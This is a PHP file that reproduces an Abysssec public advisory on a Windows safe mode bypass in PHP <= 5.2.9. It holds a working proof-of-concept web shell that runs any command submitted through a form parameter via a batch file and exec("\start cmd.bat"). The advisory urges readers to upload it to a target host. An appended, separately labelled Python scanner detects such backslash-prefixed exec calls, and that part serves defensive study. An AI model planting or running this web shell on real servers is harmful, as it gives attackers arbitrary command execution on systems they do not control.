<?php
//cmd.php
/*
Abysssec Inc Public Advisory

Here is another safe mode bypass vulnerability that exists in PHP <= 5.2.9 on Windows.
The problem comes from OS behavior: the implementation and interfacing between PHP
and the operating system's directory structure. PHP does not tell the difference
between directory browsing on Linux and on Windows, which can give an attacker the ability
to execute his/her commands on the target machine even with SafeMode On (php.ini setting).
=============================================================================
On Linux, when you want to open a directory, for example the php directory, you need
to go to /usr/bin/php and you can't use \usr\bin\php. But Windows won't tell the
difference between slash and backslash, which means there is no difference between
c:\php and c:/php. This is not a vulnerability by itself, but because of this simple
PHP implementation the "\" character can escape safe mode using a function like exec.

Here is a PoC for the discussed vulnerability. Just upload the files to your target host and execute
your commands.
==============================================================================
Note: this vulnerability is just for educational purposes and the author will not be responsible
for any damage caused by using this vulnerability.
==============================================================================
For more information visit Abysssec.com
Feel free to contact me at admin [at] abysssec.com
*/

$cmd = $_REQUEST['cmd'];
if ($cmd) {
    // Write the submitted command to a batch file, redirecting its output to abysssec.txt
    $batch = fopen("cmd.bat", "w");
    fwrite($batch, "$cmd>abysssec.txt" . "\r\n");
    fwrite($batch, "exit");
    fclose($batch);

    // The leading "\" is the safe mode escape described in the advisory above
    exec("\start cmd.bat");

    echo "<center>";
    echo "<h1>Abysssec.com PHP <= 5.2.9 SafeMod Bypasser</h1>";
    echo "<textarea rows=20 cols=60>";
    require("abysssec.txt");
    echo "</textarea>";
    echo "</center>";
}
?>
<html>
<body bgcolor=#000000 and text=#DO0000>
<center>
<form method=post>
<input type=text name=cmd >
<input type=submit value=bypass>
</form>
</center>
</body>
</html>
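
The advisory's trigger is a command string that begins with "\" passed to a function like exec. The following is an added detection example, not part of the original advisory or PoC: a source scanner that flags such calls in PHP files on a Windows host. It goes beyond the single exec call on the page by also checking other command-execution functions; that function list and the names `scan_php`, `EXEC_FUNCS` and `SAMPLE` are assumptions made for this example.

```python
import re

# Assumption: command-execution functions worth checking besides exec,
# which is the only one the advisory names explicitly.
EXEC_FUNCS = ("exec", "system", "passthru", "shell_exec", "popen", "proc_open")

# An exec-family call whose first argument is a string literal that starts
# with a backslash, e.g. exec("\start cmd.bat"). The lookbehind skips
# look-alikes such as curl_exec(...) and method calls like $db->exec(...).
PATTERN = re.compile(
    r"(?<![\w>$:])(?P<func>" + "|".join(EXEC_FUNCS) + r")"
    r"\s*\(\s*(?P<quote>['\"])(?P<arg>\\[^'\"]*)(?P=quote)",
    re.IGNORECASE,
)


def scan_php(source):
    """Return (line_number, function, argument) for each suspicious call."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for m in PATTERN.finditer(line):
            hits.append((lineno, m.group("func").lower(), m.group("arg")))
    return hits


# Constructed sample input: line 3 is the call from the PoC on this page,
# the remaining lines are benign code that must not be flagged.
SAMPLE = r'''<?php
exec("whoami");
exec("\start cmd.bat");
curl_exec("\\not-a-shell-call");
$db->exec('\x');
?>'''

if __name__ == "__main__":
    for lineno, func, arg in scan_php(SAMPLE):
        print(f"line {lineno}: {func}() called with backslash-prefixed command {arg!r}")
```

A hit only marks a call for review; commands assembled from variables at run time are not visible to a literal-based scan like this one.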